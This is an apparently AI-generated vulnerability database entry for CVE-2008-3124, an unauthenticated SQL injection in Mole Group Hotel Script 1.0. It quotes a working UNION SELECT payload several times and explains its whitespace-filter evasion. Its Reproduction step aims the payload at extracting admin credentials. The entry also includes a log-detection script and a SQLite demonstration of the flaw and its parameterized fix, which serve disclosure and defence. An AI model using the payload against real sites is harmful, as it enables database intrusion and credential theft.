CVE-2008-3124
Description
Mole Group Hotel Script 1.0 suffers from a remote SQL injection in the file parameter, allowing attackers to extract database contents.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Mole Group Hotel Script 1.0 contains a SQL injection vulnerability in index.php via the file parameter. The application fails to sanitize user-supplied input before incorporating it into an SQL query [1]. This allows an attacker to inject arbitrary SQL commands. The vulnerable query is constructed directly from the file variable without proper escaping or parameterization [1].
Exploitation
The attacker can exploit this vulnerability by sending a crafted HTTP GET request to index.php with a malicious file parameter. No authentication is required; the attacker only needs network access to the web server [1]. The published example URL is:
http://site.com/index.php?file=1/**/UNION/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
The payload terminates the original comparison with the value 1, appends a UNION SELECT with four columns (which must match the column count of the original query for the UNION to be accepted), reads the name column of the settings table, and ends with /* so that whatever follows the injection point in the original query is commented out. Inline comments (/**/) stand in for spaces, which defeats filters that strip or reject whitespace [1].
Impact
Successful exploitation allows an attacker to execute arbitrary SQL commands with the privileges of the application's database account, leading to disclosure of sensitive information stored in the database, such as the application's configuration settings (e.g., database credentials, site configuration) [1]. The attacker can potentially retrieve any data that account can read, including user credentials or other confidential records.
Mitigation
No official patch or fixed version has been released by the vendor; according to the exploit disclosure, the vendor was not notified [1]. Users should upgrade to a newer supported version if one exists. Otherwise, as a workaround, validate the file parameter before use (if, as the example payload suggests, it is a numeric page identifier, accept only digits) and pass it to the database through a parameterized query rather than string concatenation [1]. The vulnerability is not listed in CISA KEV as of this writing.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:mole_group:hotel_script:1.0:*:*:*:*:*:*:*
- (no CPE) version range: = 1.0
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the "file" parameter of index.php allows SQL injection."
Attack vector
An unauthenticated remote attacker sends an HTTP GET request to index.php with a crafted "file" parameter containing SQL injection payloads [ref_id=1]. The application fails to neutralize special SQL syntax in this parameter, allowing the attacker to inject arbitrary SQL commands [CWE-89]. The exploit demonstrates a UNION-based injection that reads the name column of the "settings" table; the selected column is wrapped in CONVERT(... USING latin1), the usual way of keeping MySQL from rejecting the UNION with a collation mismatch error, and according to the advisory the returned data includes the administrator's credentials [ref_id=1]. The only precondition is network access to the vulnerable web application.
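As an added detection example (not part of the advisory or of the vendor's code), the check below parses Apache-style access-log lines, decodes the file parameter of requests to index.php, folds the /**/ comment obfuscation back into whitespace, and flags UNION ... SELECT payloads. The log lines, client addresses and timestamps are constructed for the example, and the rule that a legitimate file value is a bare integer is an assumption taken from the payload's leading 1, not from the application's documentation.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache combined format. Addresses and
# timestamps are made up; the third request carries the payload quoted in the
# advisory and the fourth the same idea with percent-encoded spaces.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2008:14:02:11 +0000] "GET /index.php?file=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jul/2008:14:02:15 +0000] "GET /index.php?file=2 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2008:14:03:40 +0000] "GET /index.php?file=1/**/UNION/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/* HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2008:14:03:41 +0000] "GET /index.php?file=1%20UNION%20SELECT%201,2,3,4%20FROM%20settings HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
UNION_RE = re.compile(r'\bunion\b(?:\s+all)?\s+select\b')


def normalize(value):
    """Fold the obfuscations that matter here so the keyword test sees plain
    SQL: inline comments become spaces, runs of whitespace collapse, and the
    text is lower-cased. parse_qs has already percent-decoded the value."""
    value = re.sub(r'/\*.*?\*/', ' ', value)
    return re.sub(r'\s+', ' ', value).strip().lower()


def classify_file_param(value):
    """Return None for a benign value, or a short reason string. A purely
    numeric page id is taken as the expected shape (an assumption about this
    application based on the payload's leading 1)."""
    if value.isdigit():
        return None
    if UNION_RE.search(normalize(value)):
        return 'union-select'
    return 'non-numeric-file'


def flag_requests(log_text):
    """Scan log lines and return (ip, timestamp, reason, raw file value) for
    every index.php request whose file parameter looks like an injection."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        if not url.path.endswith('/index.php'):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get('file', []):
            reason = classify_file_param(value)
            if reason:
                hits.append((m.group('ip'), m.group('ts'), reason, value))
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

The comment-folding step is what makes the rule robust against the /**/ variant; a rule that only looks for "UNION SELECT" with a literal space misses the advisory's payload entirely.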
Affected code
The vulnerability exists in index.php of Mole Group Hotel Script 1.0. The "file" parameter is passed directly into an SQL query without sanitization, as shown in the exploit: `http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*` [ref_id=1]. No patch file is available in the bundle.
What the fix does
No patch is included in the bundle, and the advisory states the vendor was not notified before disclosure [ref_id=1]. Remediation would require keeping the "file" value out of the SQL text: a prepared statement with the value bound as a parameter, combined with type validation of the parameter (the example payload suggests it should be a bare integer); escaping special characters is a weaker fallback that still depends on every query being assembled correctly [CWE-89]. Without a fix, the application remains vulnerable to SQL injection via the file parameter.
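The following is an added example, not code from the advisory or from Mole Group, and it serves both the Exploitation section above and the remediation described here. It rebuilds the flaw in Python against an in-memory SQLite database with an assumed table layout (a four-column pages table and a settings table with name and value columns), since the script's real schema is not in the references, and with the MySQL-only CONVERT(... USING latin1) dropped from the payload because SQLite has no such function. It shows the /**/ payload slipping past a whitespace filter, pulling settings rows out through the concatenated query, and doing nothing once the same value is bound as a parameter.

```python
import sqlite3

# Constructed stand-in schema. The real Hotel Script tables are not documented in
# the references; only the four-column shape (1,...,3,4) and the "settings" table
# with a "name" column come from the published payload.
SCHEMA = """
CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, published INTEGER);
INSERT INTO pages VALUES (1, 'Welcome', 'Rooms from 50 EUR per night', 1);
INSERT INTO pages VALUES (2, 'Unpublished draft', 'Not live yet', 0);
CREATE TABLE settings (id INTEGER, name TEXT, value TEXT);
INSERT INTO settings VALUES (1, 'admin_user', 'admin');
INSERT INTO settings VALUES (2, 'admin_pass', 's3cret!');
"""

# The advisory's payload with one change: CONVERT(name USING latin1) is MySQL
# syntax that SQLite lacks, so the column is selected bare. The comment-for-space
# trick and the trailing /* are unchanged.
PAYLOAD = "1/**/UNION/**/SELECT/**/1,name,value,4/**/FROM/**/settings/*"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, file_param):
    """The flaw as the advisory describes it: the request value is pasted into
    the SQL text, so SQL syntax in it becomes part of the statement. The
    trailing /* in the payload comments out the 'AND published = 1' clause."""
    sql = ("SELECT id, title, body, published FROM pages "
           f"WHERE id = {file_param} AND published = 1")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, file_param):
    """Hardened form: the value travels as a bound parameter and can only ever
    be compared against id, never parsed as SQL."""
    sql = ("SELECT id, title, body, published FROM pages "
           "WHERE id = ? AND published = 1")
    return conn.execute(sql, (file_param,)).fetchall()


def rejects_whitespace(file_param):
    """A naive filter that blocks any value containing whitespace. It lets the
    payload through, which is exactly why the exploit uses /**/ for spaces."""
    return any(ch.isspace() for ch in file_param)


def leaked_settings(rows):
    """Pick the settings rows out of a result set: the injected SELECT marks
    them with the literal 4 in the fourth column, where real pages carry 0/1."""
    return {(name, value) for (_, name, value, marker) in rows if marker == 4}


if __name__ == "__main__":
    db = open_db()
    print("whitespace filter blocks payload:", rejects_whitespace(PAYLOAD))
    print("vulnerable query returns:", vulnerable_lookup(db, PAYLOAD))
    print("settings rows leaked:", leaked_settings(vulnerable_lookup(db, PAYLOAD)))
    print("parameterized query returns:", safe_lookup(db, PAYLOAD))
```

With the bound parameter the whole payload string is compared against the id column as one value and matches nothing; the same request against the concatenated query returns the settings rows alongside the page it was supposed to fetch.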
Preconditions
- network: Network access to the vulnerable web application
- auth: No authentication required
Reproduction
Visit `http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*` to extract admin credentials from the settings table [ref_id=1]. The admin login panel is located at `/admin/` [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.